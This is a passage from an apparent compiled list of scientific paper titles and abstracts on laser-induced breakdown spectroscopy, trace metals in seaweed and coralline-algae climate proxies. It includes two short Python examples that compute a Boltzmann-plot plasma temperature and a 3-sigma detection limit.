For this objective, the pulsed radiation of a Q-switched Nd:YAG laser at 1064 nm has been used to produce a plasma in a remote sample, the light emission being collected under a coaxial open-path optical scheme and guided towards a spectrograph and then detected by an intensified CCD. A prospective study has been carried out to assess the suitability of the technique for the remote analysis of samples from a coastal scenario subjected to a high industrial activity. All the measurements have been done in the laboratory. Among the main factors influencing the analytical results, sample moisture and salinity, sample orientation and surface heterogeneity have been identified. The presence and distribution of Fe and Cr as a contaminant on sample surface has been quantified and discussed for samples including soil, rocks, and vegetation. At a stand-off distance of 12 m from the spectrometer to the sample, limits of detection in the order of 0.2% have been obtained for both elements. --- paper_title: Applications of laser-induced breakdown spectroscopy for geochemical and environmental analysis: A comprehensive review paper_content: Abstract Applications of laser-induced breakdown spectroscopy (LIBS) have been growing rapidly and continue to be extended to a broad range of materials. This paper reviews recent applications of LIBS for the analysis of geological and environmental materials, here termed "GEOLIBS". Following a summary of fundamentals of the LIBS analytical technique and its potential for chemical analysis in real time, the history of the application of LIBS to the analysis of natural fluids, minerals, rocks, soils, sediments, and other natural materials is described. --- paper_title: Review: Applications of single-shot laser-induced breakdown spectroscopy paper_content: As applications for laser-induced breakdown spectroscopy (LIBS) become more varied with a greater number of field and industrial LIBS systems developed and as the technique evolves to be more quantitative than qualitative, there is a more significant need for LIBS systems capable of analysis with the use of a single laser shot. In single-shot LIBS, a single laser pulse is used to form a single plasma for spectral analysis. In typical LIBS measurements, multiple laser pulses are formed and collected and an ensemble-averaged method is applied to the spectra. For some applications there is a need for rapid chemical analysis and/or non-destructive measurements; therefore, LIBS is performed using a single laser shot. This article reviews in brief several applications that demonstrate the applicability and need for single-shot LIBS. --- paper_title: Femtosecond Laser-Induced Breakdown Spectroscopy: Physics, Applications, and Perspectives paper_content: Progress in technology and society continually places new demands on analytical science and more powerful and informative methods need to be developed. One among them is laser-induced breakdown spectroscopy (LIBS), sometimes also referred to as LIPS (laser-induced plasma spectroscopy). Typically, LIBS measurements are conducted with nanosecond time scale lasers. A review by Song et al. [1] and two recently published books by Miziolek et al. [2] and Cremers et al. [3] give a good overview of instrumental developments in this area. However, new developments in laser technology have made ultra-short lasers available [4] and have stimulated an interest in LIBS with ultra-short pulses.
There are fundamental differences between the ablation processes of ultra-short (< 1 ps) and short (> 1 ps) pulses that result in different mechanisms of energy dissipation in the sample. In the case of ultra-short laser pulses, at the end of the laser pulse, only a very hot electron gas and a practically undisturbed lattice are found, which subsequently interact. However, for longer pulses above a certain energy threshold, the material undergoes transient changes in the thermodynamic states from solid, through liquid, into a plasma state [5,6]. Based on this difference, consequences for the analytical performance of the method can be expected that in the future should lead to new aspects in instrumentation and applications of LIBS. The goal of this review is to summarize current knowledge of the instrumentation and physics of laser ablation with femtosecond lasers and to draw some conclusions concerning new possible applications that rely on these specific new features. It seems clear that even if a better performance in terms of analytical figures of merit compared to standard LIBS applications [7] is found, a replacement of current technology cannot be expected soon due to the cost and complexity of chirped pulse amplification (CPA) laser systems. However, current trends in other fields of application of these laser systems, e.g., medical laser applications or material processing [8], may change this picture in the near future. --- paper_title: Laser-induced breakdown spectroscopy for quantitative analysis of copper in algae paper_content: Laser-induced breakdown spectroscopy (LIBS) has been applied for quantitative analysis of Cu in algae plants, an issue of paramount importance for environmental monitoring. For the analysis with LIBS, algae were compacted into solid pellets with powdered calcium hydroxide addition as binder and a pulsed Nd:YAG laser was employed to produce the plasmas in air at atmospheric pressure. In this approach, atomic lines from traces of Cu were detected, as well as other major and minor elements. The plasma was characterized and a calibration curve was constructed with reference samples prepared with calcium hydroxide. The results obtained demonstrated the usefulness of the method for Cu monitoring in algae plants. --- paper_title: Laser Induced Breakdown Spectroscopy for Elemental Analysis in Environmental, Cultural Heritage and Space Applications: A Review of Methods and Results paper_content: Analytical applications of Laser Induced Breakdown Spectroscopy (LIBS), namely optical emission spectroscopy of laser-induced plasmas, have been constantly growing thanks to its intrinsic conceptual simplicity and versatility. Qualitative and quantitative analysis can be performed by LIBS both by drawing calibration lines and by using calibration-free methods, and some of its features, such as fast multi-elemental response, micro-destructiveness, instrumentation portability, have rendered it particularly suitable for analytical applications in the field of environmental science, space exploration and cultural heritage. This review reports and discusses LIBS achievements in these areas and results obtained for soils and aqueous samples, meteorites and terrestrial samples simulating extraterrestrial planets, and cultural heritage samples, including buildings and objects of various kinds.
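Several of the entries above (the plasma characterization review and the liquid-sample studies that check the LTE assumption) obtain the plasma temperature from relative line intensities. The short sketch below illustrates the standard Boltzmann-plot estimate of that temperature; the line data are invented placeholders, not values taken from any of the cited papers.

import numpy as np

# Boltzmann plot: for optically thin lines of one species in LTE,
#   ln(I * lambda / (g_k * A_ki)) = -E_k / (k_B * T) + const,
# so a straight-line fit of y against the upper-level energy E_k gives
# slope = -1 / (k_B * T).
K_B_EV = 8.617333e-5  # Boltzmann constant in eV/K

# Hypothetical line data for a single species (placeholder values only).
wavelength_nm = np.array([371.99, 373.49, 374.56, 382.04])  # line wavelengths
g_A = np.array([1.6e7, 9.0e6, 7.6e6, 1.2e7])                # g_k * A_ki in 1/s
E_upper_eV = np.array([3.33, 4.18, 4.30, 4.19])             # upper-level energies
intensity = np.array([1.00, 0.21, 0.16, 0.30])              # background-corrected intensities

y = np.log(intensity * wavelength_nm / g_A)
slope, intercept = np.polyfit(E_upper_eV, y, 1)  # least-squares straight line
T_kelvin = -1.0 / (slope * K_B_EV)
print(f"Boltzmann-plot temperature: {T_kelvin:.0f} K")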
--- paper_title: Laser-induced breakdown spectroscopy for analysis of plant materials: A review paper_content: Abstract Developments and contributions of laser-induced breakdown spectroscopy (LIBS) for the determination of elements in plant materials are reviewed. Several applications where the solid samples are interrogated by simply focusing the laser pulses directly onto a fresh or dried surface of leaves, roots, fruits, vegetables, wood and pollen are presented. For quantitative purposes aiming at plant nutrition diagnosis, the test sample presentation in the form of pressed pellets, prepared from clean, dried and properly ground/homogenized leaves, and the use of univariate or multivariate calibration strategies are revisited. --- paper_title: Comparing several atomic spectrometric methods to the super stars: special emphasis on laser induced breakdown spectrometry, LIBS, a future super star paper_content: The "super stars" of analytical atomic spectrometry are electrothermal atomization-atomic absorption spectrometry (ETA-AAS), inductively coupled plasma-atomic emission spectrometry (ICP-AES) and inductively coupled plasma-mass spectrometry (ICP-MS). Many other atomic spectrometric methods have been used to determine levels of elements present in solid, liquid and gaseous samples, but in most cases these other methods are inferior to the big three super star methods. The other atomic methods include glow discharge emission, absorption and mass spectrometric methods, laser excited fluorescence emission and ionization methods, and flame and microwave plasma emission and mass spectrometric methods. These "lesser" methods will be compared to the "super star" methods based on a number of figures of merit, including detection power, selectivity, multi-element capability, cost, applications, and "age" of the methods. The "age" of the method will be determined by a modification of the well-known Laitinen "Seven Ages of an Analytical Method" (H.A. Laitinen, Anal. Chem., 1973, 45, 2305). Calculations will show that certain methods are capable of single atom detection, including several atomic absorption methods, as well as laser atomic ionization and fluorescence methods. The comparison of methods will indicate why the "super stars" of atomic spectrometric methods will continue to retain their status and what must be done for the lesser atomic methods to approach "super star" status. Certainly most of the lesser atomic spectrometric methods will have a limited place in the analytical arena. Because of the wide current interest and research activity, special emphasis will be placed on the technique of laser induced breakdown spectrometry (LIBS). Its current status and future developments will therefore be reviewed. --- paper_title: Application of laser-induced breakdown spectroscopy to the analysis of algal biomass for industrial biotechnology paper_content: Abstract We report on the application of laser-induced breakdown spectroscopy (LIBS) to the determination of elements distinctive in terms of their biological significance (such as potassium, magnesium, calcium, and sodium) and to the monitoring of accumulation of potentially toxic heavy metal ions in living microorganisms (algae), in order to trace e.g. the influence of environmental exposure and other cultivation and biological factors having an impact on them. Algae cells were suspended in liquid media or presented in a form of adherent cell mass on a surface (biofilm) and, consequently, characterized using their spectra.
In our feasibility study we used three different experimental arrangements employing double-pulse LIBS technique in order to improve on analytical selectivity and sensitivity for potential industrial biotechnology applications, e.g. for monitoring of mass production of commercial biofuels, utilization in the food industry and control of the removal of heavy metal ions from industrial waste waters. --- paper_title: Quantitative analysis of toxic metals lead and cadmium in water jet by laser-induced breakdown spectroscopy paper_content: Laser-induced breakdown spectroscopy (LIBS) has been applied to the analysis of toxic metals Pb and Cd in Pb(NO3)2 and Cd(NO3)2.4H2O aqueous solutions, respectively. The plasma is generated by focusing a nanosecond Nd:YAG (λ=1064 nm) laser on the surface of liquid in the homemade liquid jet configuration. With an assumption of local thermodynamic equilibrium (LTE), calibration curves of Pb and Cd were obtained at different delay times between 1 to 5 μs. The temporal behavior of limit of detections (LOD) was investigated and it is shown that the minimum LODs for Pb and Cd are 4 and 68 parts in 10^6 (ppm), respectively. In order to demonstrate the correctness of the LTE assumption, plasma parameters including plasma temperature and electron density are evaluated, and it is shown that the LTE condition is satisfied at all delay times. --- paper_title: Determination of colloidal iron in water by laser-induced breakdown spectroscopy paper_content: Abstract Laser-induced breakdown spectroscopy was applied to the determination of FeO(OH) in water and successfully determined the concentration of the turbid solution down to a few ppm (μg ml^-1). A Q-switched Nd:YAG laser, which delivered 8 ns pulses, was used as an excitation source. Cell-less measurement was achieved using a coaxial nozzle flow system which allowed to study the effect of ambient gas on emission intensity and decay lifetime of the breakdown plasma. Using helium gas and with a proper timing gate, the FeO(OH) concentration in water was determined in the ppm range.
--- paper_title: Application of laser-induced breakdown spectroscopy to in situ analysis of liquid samples paper_content: A realization of laser-induced breakdown spectroscopy for real-time, in situ and remote analysis of trace amounts in liquid samples is described, which is potentially applicable to the analysis of pollutants in water in harsh or difficult-to-reach environments. Most of the measurements were conducted using a fiber assembly that is capable of both delivering the laser light and collecting the light emitted from the micro plasma, up to about 30 m from the target area. Alternatively, a telescopic arrangement for line-of-sight measurements was employed, with a range of 3 to 5 m. For internal standardization and the generation of concentration calibration curves, reference lines of selected elements were used. In the majority of cases calibration against the matrix element hydrogen was employed using the Hα, Hβ, and Hγ lines, but also spiking with selected reference species was utilized. In order to provide high reliability and repeatability in the analyses, we also measured plasma parameters such as electron density, plasma temperature, and line-shape functions, and determined their influence on the measurement results. Numerous elements, including a range of toxic heavy metals, have been measured over a wide range of concentrations (Al, Cr, Cu, Pb, Tc, U, and others). Limits of detection usually were in the range of a few parts per million; for several elements even lower concentrations could be measured. --- paper_title: Determination of an iron suspension in water by laser-induced breakdown spectroscopy with two sequential laser pulses. paper_content: We have applied laser-induced breakdown spectroscopy to quantitative analysis of colloidal and particulate iron in water. A coaxial sample flow apparatus developed in our previous work, which allowed us to control the atmosphere of laser-induced plasma, was used. Using sequential laser pulses from two Q-switched Nd:YAG lasers as excitation sources, the FeO(OH) concentration in the tens of ppb range was determined with an optimum interval between two laser pulses and an optimum delay time of a detector gate from the second pulse. The detection limit of Fe decreased substantially using two sequential laser pulse excitations: from the 0.6 ppm limit of single pulse excitation to 16 ppb with sequential pulse excitation. The effects of the second laser pulse on the plasma emission were studied. The concentration of iron in fine particles in boiler water sampled from a commercially operated thermal power plant has been determined successfully by this method. The results show the capability of laser-induced breakdown spectroscopy in determining suspended colloidal and particulate impurities in a simple and quick way. --- paper_title: Investigation of laser-induced breakdown spectroscopy of a liquid jet paper_content: We investigate the feasibility of laser-induced breakdown spectroscopy for determination of heavy metal Pb in a Pb(NO3)2 aqueous solution by using a simple homemade vertical jet device and nanosecond laser pulses.
Key experimental parameters that affect the analytical performance, such as delay of the time of observation, laser pulse energy, and liquid flow rate are optimized for the best limit of detection (LOD). The LOD was determined using Pb I emission at 405.781 nm, and after optimization, the 3σ LOD was found to be at the level of 60 ppm. --- paper_title: Study of laser-induced breakdown emission from liquid under double-pulse excitation. paper_content: The application of laser-induced breakdown spectroscopy to liquid samples, by use of a Nd:YAG laser in double-pulse excitation mode, is described. It is found that the line emission from a magnesium ion or atom is more than six times greater for double-pulse excitation than for single-pulse excitation. The effect of interpulse separation on the emission intensity of a magnesium ion and a neutral atom showed an optimum enhancement at a delay of 2.5–3 μs. The intensity of neutral atomic line emission dominates the ion emission from the plasma for higher interpulse (>10 μs) separation. A study of the temporal evolution of the line emission from the plasma shows that the background as well as line emission decays faster in double-pulse excitation than in single-pulse excitation. The enhancement in the emission seems to be dominated by an increase in the volume of the emitting gas. The limit of detection for a magnesium solution improved from 230 parts per billion (ppb) in single-pulse mode to 69 ppb in double-pulse mode. --- paper_title: Carbon emissions following 1.064 μm laser ablation of graphite and organic samples in ambient air paper_content: Laser ablation of graphite and organic samples is studied in the context of chemical analysis by laser-induced plasma spectroscopy. Ablation is performed using an Nd:YAG laser at 1.064 μm in ambient air at atmospheric pressure. Following ablation of graphite, we find results consistent with C2 (as well as C) being released directly from the target, and CN being formed later on by the interaction of C2 with atmospheric nitrogen (N2). In the case of organic compounds, we find a clear relationship between C2 emission from the plasma and the presence of aromatic rings (containing carbon–carbon double bonds) in the compounds. --- paper_title: Ultraviolet laser microplasma-gas chromatography detector: detection of species-specific fragment emission. paper_content: Characteristic laser-produced microplasma emissions from various simple carbon-containing vapors entrained in a He carrier gas have been observed and compared. A focused ArF (193-nm) excimer laser is used to induce microplasmas with modest pulse energies (15 mJ or less) in the effluent region of a gas chromatography capillary column. Strong atomic (C, H, O, Cl, and F) as well as molecular (C2, CH, and CCl) emissions are observed with very high SNRs. A plasma emission survey indicates that different classes of molecule show unique spectra which make it relatively easy to distinguish one chemical class from another. These results suggest that a laser microplasma gas chromatography detector (LM-GCD) should offer additional discrimination/resolution for unknown sample gas mixture analysis. In addition, the LM-GCD exhibits a significant advantage over certain other GC detectors, like the widely used flame ionization detector, by readily detecting nonresponsive gases such as CO, CO2, CCl4 and Freons.
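Several of the liquid-sample entries above quote limits of detection derived from a linear calibration curve together with the 3σ criterion (three times the standard deviation of the blank divided by the calibration slope). The sketch below shows that calculation on made-up numbers; it is a generic illustration of the procedure, not a reproduction of any cited analysis.

import numpy as np

# Hypothetical calibration data: analyte concentration (ppm) vs. net line intensity (a.u.).
concentration_ppm = np.array([0.0, 50.0, 100.0, 200.0, 400.0])
net_intensity = np.array([2.1, 110.0, 215.0, 430.0, 870.0])

# Replicate blank measurements, used to estimate the noise level.
blank_intensity = np.array([1.8, 2.4, 2.0, 2.3, 1.9, 2.2])

slope, intercept = np.polyfit(concentration_ppm, net_intensity, 1)
sigma_blank = np.std(blank_intensity, ddof=1)

lod_ppm = 3.0 * sigma_blank / slope    # 3-sigma limit of detection
loq_ppm = 10.0 * sigma_blank / slope   # 10-sigma limit of quantification, often reported alongside
print(f"slope = {slope:.2f} a.u./ppm, LOD = {lod_ppm:.3f} ppm, LOQ = {loq_ppm:.3f} ppm")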
--- paper_title: Femtosecond time-resolved laser-induced breakdown spectroscopy for detection and identification of bacteria: A comparison to the nanosecond regime paper_content: Bacterial samples (Escherichia coli and Bacillus subtilis) have been analyzed by laser-induced breakdown spectroscopy (LIBS) using femtosecond pulses. We compare the obtained spectra with those resulting from the classical nanosecond LIBS.
Specific features of femtosecond LIBS have been demonstrated, very attractive for analyzing biological samples: (i) a lower plasma temperature leading to negligible nitrogen and oxygen emissions from excited ambient air and a better contrast in detection of trace mineral species; and (ii) a specific ablation regime that favors intramolecular bonds emission with respect to atomic emission. A precise kinetic study of molecular band head intensities allows distinguishing the contribution of native CN bonds released by the sample from that due to carbon recombination with atmospheric nitrogen. Furthermore, a sensitive detection of trace mineral elements provides specific spectral signatures of different bacteria. An example is given for the Gram test provided by different magne... --- paper_title: Classification of vegetable oils based on their concentration of saturated fatty acids using laser induced breakdown spectroscopy (LIBS). paper_content: Spectrochemical analyses of organic liquid media such as vegetable oils and sweetened water were performed with the use of LIBS. The aim of this work is to study, on the basis of spectral analyses by LIBS technique of "Swan band" of C2 emitted by different vegetable oils in liquid phase, the characteristics of each organic medium. Furthermore this paper proposes, as a classification, a single parameter that could be used to determine the concentration of saturated fatty acids of vegetable oils. A Nd:YAG laser operating at λ=532 nm and an energy per pulse of 30 mJ was focused onto the surface of the liquid in ambient air.
Following ablation of vegetable oils and sweetened water, we find that vibrational bands of C2 were released from molecules containing linear carbon–carbon bonds. In the case of vegetable oils, we find a clear relationship between C2 emission from the plasma and the concentration of saturated fatty acids in the oil. --- paper_title: Laser-Induced Breakdown Spectroscopy of Liquids: Aqueous Solutions of Nickel and Chlorinated Hydrocarbons paper_content: Spectrochemical analyses of aqueous solutions containing nickel or the chlorinated hydrocarbons (CHCs) C2Cl4, CCl4, CHCl3, and C2HCl3 were performed with the use of laser-induced breakdown spectroscopy. A Nd:YAG laser operating at 60 mJ/pulse was focused onto the surface of the liquid. Elemental line intensities were monitored in the laser-produced plume as a function of analyte concentration to determine detection limits. The limits of detection for nickel in water were 36.4 ± 5.4 mg/L and 18.0 ± 3.8 mg/L for laser irradiation at 1.06 μm and 355 nm, respectively. Ablation of pure CHCs at 355 nm produced extremely intense plasma emissions that primarily consisted of spectroscopic features attributed to CN, C3, H, N, and Cl. The spectra were structurally identical for all the CHCs except for differences in the intensities of various emission lines. With the use of emission from neutral atomic chlorine as an identifier for CHC contamination of water, no detectable traces of these elements were observed in saturated aqueous solutions. The detection limits for the CHCs were well above the saturation limits of CHC in water. --- paper_title: Quantitative molecular analysis with molecular bands emission using laser-induced breakdown spectroscopy and chemometrics paper_content: The present work describes the first quantitative molecular prediction using laser-induced molecular bands along with chemometrics. In addition, this spectroscopic procedure has demonstrated the first complete quantitative analysis utilizing traditionally insensitive elements for pharmaceutical formulations. Atomic LIBS requires certain sensitive elements, such as Cl, F, Br, S and P, in order to quantitate a specific organic compound in a complex matrix. Molecular LIBS has been demonstrated to be the first successful approach using atomic spectroscopy to evaluate a complex organic matrix. This procedure is also the first quantitative analysis using laser-induced molecular bands and chemometrics. We have successfully applied chemometrics to predict the formulation excipients and active pharmaceutical ingredient (API) in a complex pharmaceutical formulation. Using such an approach, we demonstrate that the accuracy for the API and a formulation lubricant, magnesium stearate, have less than 4% relative bias. The other formulation excipients such as Avicel® and lactose have been accurately predicted to have less than a 15% relative bias. Molecular LIBS and chemometrics have provided a novel approach for the quantitative analysis of several molecules that was not technically possible with the traditional atomic LIBS procedure, that required sensitive elements to be present in both API and formulation excipients. --- paper_title: Laser-induced breakdown spectroscopy of bacterial spores, molds, pollens, and protein: initial studies of discrimination potential paper_content: Laser-induced breakdown spectroscopy (LIBS) has been used to study bacterial spores, molds, pollens, and proteins. Biosamples were prepared and deposited onto porous silver substrates.
LIBS data from the individual laser shots were analyzed by principal-components analysis and were found to contain adequate information to afford discrimination among the different biomaterials. Additional discrimination within the three bacilli studied appears feasible. --- paper_title: Detection of bacteria by time-resolved laser-induced breakdown spectroscopy. paper_content: A laser-induced breakdown spectroscopy technique for analyzing biological matter for the detection of biological hazards is investigated. Eight species were considered in our experiment: six bacteria and two pollens in pellet form. The experimental setup is described, then a cumulative intensity ratio is proposed as a quantitative criterion because of its linearity and reproducibility. Time-resolved laser-induced breakdown spectroscopy (TRELIBS) exhibits a good ability to differentiate among all these species, whatever the culture medium, the species or the strain. Thus we expect that TRELIBS will be a good candidate for a sensor of hazards either on surfaces or in ambient air. --- paper_title: Laser-Induced Breakdown Spectroscopy analysis of Bacteria: What Femtosecond Lasers Make Possible paper_content: Laser Induced Breakdown Spectroscopy spectra of bacteria, with nanosecond and femtosecond ablation, are compared. High sensitivity for mineral trace detections, larger intensity from molecular bands and precise kinetic study are among benefits using short pulses. --- paper_title: Elemental and radioactive analysis of commercially available seaweed. paper_content: Edible seaweed products have been used in many countries, specifically Japan, as a food item. Recently these products have become popular in the food industry because of a number of interesting medicinal properties that have been associated with certain edible marine algae. Very little control exists over the composition of these products, which could be contaminated with a number of agents including heavy metals and certain radioactive isotopes. Fifteen seaweed samples (six local samples from the coast of British Columbia, seven from Japan, one from Norway and one undisclosed) were obtained. All samples were analyzed for multiple elements, using ICP mass spectrometry and for radioactive constituents. It was found that six of eight imported seaweed products had concentrations of mercury orders of magnitude higher than the local products. Lead was found at somewhat higher concentrations in only one local product. Laminaria japonica had the highest level of iodine content followed by Laminaria setchellii from local sources. Only traces of cesium-137 were found in a product from Norway and radium-226 was found in a product from Japan. Arsenic levels were found to be elevated. In order to estimate the effect of these levels on health, one needs to address the bioavalability and the speciation of arsenic in these samples. --- paper_title: A general model for ontogenetic growth. paper_content: Several equations have been proposed to describe ontogenetic growth trajectories for organisms justified primarily on the goodness of fit rather than on any biological mechanism. Here, we derive a general quantitative model based on fundamental principles for the allocation of metabolic energy between maintenance of existing tissue and the production of new biomass. We thus predict the parameters governing growth curves from basic cellular properties and derive a single parameterless universal curve that describes the growth of many diverse species. 
The model provides the basis for deriving allometric relationships for growth rates and the timing of life history events. --- paper_title: High-resolution analysis of trace elements in crustose coralline algae from the North Atlantic and North Pacific by laser ablation ICP-MS paper_content: We have investigated the trace elemental composition in the skeleta of two specimens of attached-living coralline algae of the species Clathromorphum compactum from the North Atlantic (Newfoundland) and Clathromorphum nereostratum from the North Pacific/Bering Sea region (Amchitka Island, Aleutians). Samples were analyzed using Laser Ablation-Inductively Coupled Plasma Mass Spectrometry (LA-ICP-MS) yielding for the first time continuous individual trace elemental records of up to 69 years in length. The resulting algal Mg/Ca, Sr/Ca, U/Ca, and Ba/Ca ratios are reproducible within individual sample specimens. Algal Mg/Ca ratios were additionally validated by electron microprobe analyses (Amchitka sample). Algal Sr/Ca, U/Ca, and Ba/Ca ratios were compared to algal Mg/Ca ratios, which previously have been shown to reliably record sea surface temperature (SST). Ratios of Sr/Ca from both Clathromorphum species show a strong positive correlation to temperature-dependent Mg/Ca ratios, implying that seawater temperature plays an important role in the incorporation of Sr into algal calcite. Linear Sr/Ca-SST regressions have provided positive, but weaker relationships as compared to Mg/Ca-SST relationships. Both algal Mg/Ca and Sr/Ca display clear seasonal cycles. Inverse correlations were found between algal Mg/Ca and U/Ca, Ba/Ca, and correlations to SST are weaker than between Mg/Ca, Sr/Ca and SST. This suggests that the incorporation of U and Ba is influenced by other factors aside from temperature. --- paper_title: Freshening of the Alaska Coastal Current recorded by coralline algal Ba/Ca ratios paper_content: Arctic Ocean freshening can exert a controlling influence on global climate, triggering strong feedbacks on ocean-atmospheric processes and affecting the global cycling of the world's oceans. Glacier-fed ocean currents such as the Alaska Coastal Current are important sources of freshwater for the Bering Sea shelf, and may also influence the Arctic Ocean freshwater budget. Instrumental data indicate a multiyear freshening episode of the Alaska Coastal Current in the early 21st century. It is uncertain whether this freshening is part of natural multidecadal climate variability or a unique feature of anthropogenically induced warming. In order to answer this, a better understanding of past variations in the Alaska Coastal Current is needed. However, continuous long-term high-resolution observations of the Alaska Coastal Current have only been available for the last 2 decades. In this study, specimens of the long-lived crustose coralline alga Clathromorphum nereostratum were collected within the pathway of the Alaska Coastal Current and utilized as archives of past temperature and salinity. Results indicate that coralline algal Mg/Ca ratios provide a 60 year record of sea surface temperatures and track changes of the Pacific Decadal Oscillation, a pattern of decadal-to-multidecadal ocean-atmosphere climate variability centered over the North Pacific.
Algal Ba/Ca ratios (used as indicators of coastal freshwater runoff) are inversely correlated to instrumentally measured Alaska Coastal Current salinity and record the period of freshening from 2001 to 2006. Similar multiyear freshening events are not evident in the earlier portion of the 60 year Ba/Ca record. This suggests that the 21st century freshening of the Alaska Coastal Current is a unique feature related to increasing glacial melt and precipitation on mainland Alaska. --- paper_title: High-resolution Mg/Ca ratios in a coralline red alga as a proxy for Bering Sea temperature variations from 1902 to 1967 paper_content: We present the first continuous, high-resolution record of Mg/Ca variations within an encrusting coralline red alga, Clathromorphum nereostratum, from Amchitka Island, Aleutian Islands. Mg/Ca ratios of individual growth increments were analyzed by measuring a single-point, electron-microprobe transect, yielding a resolution of ~15 samples/year and a 65-year record (1902–1967) of variations. Results show that Mg/Ca ratios in the high-Mg calcite algal framework display pronounced annual cyclicity and archive late spring–late fall sea-surface temperatures (SST) corresponding to the main season of algal growth. Mg/Ca values correlate well to local SST, as well as to an air temperature record from the same region. High spatial correlation to large-scale SST variability in the subarctic North Pacific is observed, with patterns of strongest correlation following the direction of major oceanographic features that play a key role in the exchange of water masses between the North Pacific and the Bering Sea. Our data correlate well with a shorter Mg/Ca record, demonstrating the ability of the alga to reliably record regional environmental signals. In addition, Mg/Ca ratios relate well to a 29-year δ18O time series measured on the same sample, providing additional support for the use of Mg in coralline red algae as a paleotemperature proxy that, unlike algal-δ18O, is not influenced by salinity fluctuations. Moreover, electron microprobe–based analysis enables higher sampling resolution and faster analysis, thus providing a promising approach for future studies of longer C. nereostratum records and applications to other coralline species. --- paper_title: Development of a new sample pre-treatment procedure based on pressurized liquid extraction for the determination of metals in edible seaweed. paper_content: A new, simple, fast and automated method based on acetic acid-pressurized liquid extraction (PLE) has been developed for the simultaneous extraction of major and trace elements (As, Ca, Cd, Co, Cr, K, Mg, Mn, Na, Pb, Sr and Zn) from edible seaweeds. The target elements have been simultaneously determined by inductively coupled plasma-optical emission spectrometry (ICP-OES). The influence of several extraction parameters (e.g. acetic acid concentration, extraction temperature, extraction time, pressure, number of cycles, particle size and diatomaceous earth (DE) mass/sample mass ratio) on the efficiency of metal leaching has been evaluated. The results showed that metal extraction efficiency depends on the mass ratio of the dispersing agent and the sample. The optimized procedure consisted of the following conditions: acetic acid (0.75 M) as an extracting solution, 5 min of extraction time, one extraction cycle at room temperature at a pressure of 10.3 MPa and addition of a dispersing agent (at a ratio of 5:1 over the sample mass).
The leaching procedure was completed after 7 min (5 min extraction time plus 1 min purge time plus 1 min end relief time). Limits of detection and quantification and repeatability of the over all procedure have been assessed. Method validation was performed analysing two seaweed reference materials (NIES-03 Chlorella Kessleri and NIES-09 Sargasso). The developed extraction method has been applied to red (Dulse and Nori), green (Sea Lettuce) and brown (Kombu, Wakame and Sea Spaghetti) edible seaweeds. --- paper_title: Coralline algal growth-increment widths archive North Atlantic climate variability paper_content: Over the past decade coralline algae have increasingly been used as archives of paleoclimate information. Encrusting coralline algae, which deposit annual growth increments in a high Mg-calcite skeleton, are amongst the longest-lived shallow marine organisms. In fact, a live-collected plant has recently been shown to have lived for at least 850 years based on radiometric dating. While a number of investigations have successfully used geochemical information of coralline algal skeletons to reconstruct sea surface temperatures, less attention has been paid to employ growth increment widths as a temperature proxy. Here we explore the relationship between growth and environmental parameters in Clathromorphum compactum collected in the subarctic Northwestern Atlantic. Results indicate that growth-increment widths of individual plants are poorly correlated with instrumental sea surface temperatures (SST). However, an averaged record of multiple growth increment-width time series from a regional network of C. compactum specimens up to 800 km apart reveals strong correlations with annual instrumental SST since 1950. Hence, similar to methods applied in dendrochronology, averaging of multiple sclerochronological records of coralline algae provides accurate climate information. A 115-year growth-increment width master chronology created from modern-collected and museum specimens is highly correlated to multidecadal variability seen in North Atlantic sea surface temperatures. Positive changes in algal growth anomalies record the well-documented regime shift and warming in the northwestern Atlantic during the 1990s. Large positive changes in algal growth anomalies were also present in the 1920s and 1930s, indicating that the impact of a concurrent large-scale regime shift throughout the North Atlantic was more strongly felt in the subarctic Northwestern Atlantic than previously thought, and may have even exceeded the 1990s event with respect to the magnitude of the warming. --- paper_title: Trace elements determination in edible seaweeds by an optimized and validated ICP-MS method paper_content: An optimized and validated inductively coupled plasma mass spectrometry (ICP-MS) method was used to analyze trace elements in seaweeds. Different volumes and rates of HNO3 and H2O2, digestion times, and microwave power levels were tested to ascertain the best conditions for sample digestion. Analytical mass and instrumental parameters were selected to assure accurate and precise determination of As, Cd, Co, Cr, Mo, Ni, Pb, Sb, Se, and V by ICP-MS. The method was optimized and validated using biological Certified Reference Materials. In addition, some samples of seaweeds (Porphyra and Laminaria) from France, Spain, Korea, and Japan were analyzed using the optimized method. Porphyra presented higher concentrations of most elements, except for As, than Laminaria. 
Seaweeds from Korea and Japan tended to display the highest concentrations of Pb and Cd. In contrast, Spanish and French samples showed the highest levels of some micro-elements essential to human nutrition. --- paper_title: Coralline algal Barium as indicator for 20th century northwestern North Atlantic surface ocean freshwater variability paper_content: During the past decades climate and freshwater dynamics in the northwestern North Atlantic have undergone major changes. Large-scale freshening episodes, related to polar freshwater pulses, have had a strong influence on ocean variability in this climatically important region. However, little is known about variability before 1950, mainly due to the lack of long-term high-resolution marine proxy archives. Here we present the first multidecadal-length records of annually resolved Ba/Ca variations from Northwest Atlantic coralline algae. We observe positive relationships between algal Ba/Ca ratios from two Newfoundland sites and salinity observations back to 1950. Both records capture episodical multi-year freshening events during the 20th century. Variability in algal Ba/Ca is sensitive to freshwater-induced changes in upper ocean stratification, which affect the transport of cold, Ba-enriched deep waters onto the shelf (highly stratified equals less Ba/Ca). Algal Ba/Ca ratios therefore may serve as a new resource for reconstructing past surface ocean freshwater changes. --- paper_title: Mineral composition of edible seaweed Porphyra vietnamensis paper_content: Abstract Edible seaweed Porphyra vietnamensis growing along seven different localities of the Central West Coast of India was analyzed for mineral composition (Na, K, Ca, Mg, B, Pb, Cr, Co, Fe, Zn, Mn, Hg, Cu, As, Ni, Cd and Mo) by inductively coupled plasma atomic emission spectroscopy (ICP-AES). The concentration ranges found for each sample, were as follows: Na, 24.5–65.6; K, 1.76–3.19, Ca, 1.40–6.12; Mg, 4.0–5.90 (mg/g d wt); Pb, 0.01–0.15; Cr, 0.13–0.22; Co, 0.06–0.20; Fe, 33.0–298; Zn, 0.93–3.27; Mn, 4.22–10.00; Hg, 0.01–0.04; Cu, 0.54–1.05; As, 1.24–1.83; Ni, 0.02–0.25; Cd, 0.14–0.55; Mo, 0.02–0.03 and B, 0.02–0.07 expressed in mg/100 g dry weight. Mineral composition of P. vietnamensis was found relatively higher as compared to the land vegetables as well as to other edible seaweeds, and it is in concurrence with the recent macrobiotic recommendation for western countries. It could therefore be used as food supplement as a spice to improve the nutritive value in the omnivorous diet. --- paper_title: Light at work: the use of optical forces for particle manipulation, sorting, and analysis. paper_content: We review the combinations of optical micro-manipulation with other techniques and their classical and emerging applications to non-contact optical separation and sorting of micro- and nanoparticle suspensions, compositional and structural analysis of specimens, and quantification of force interactions at the microscopic scale. The review aims at inspiring researchers, especially 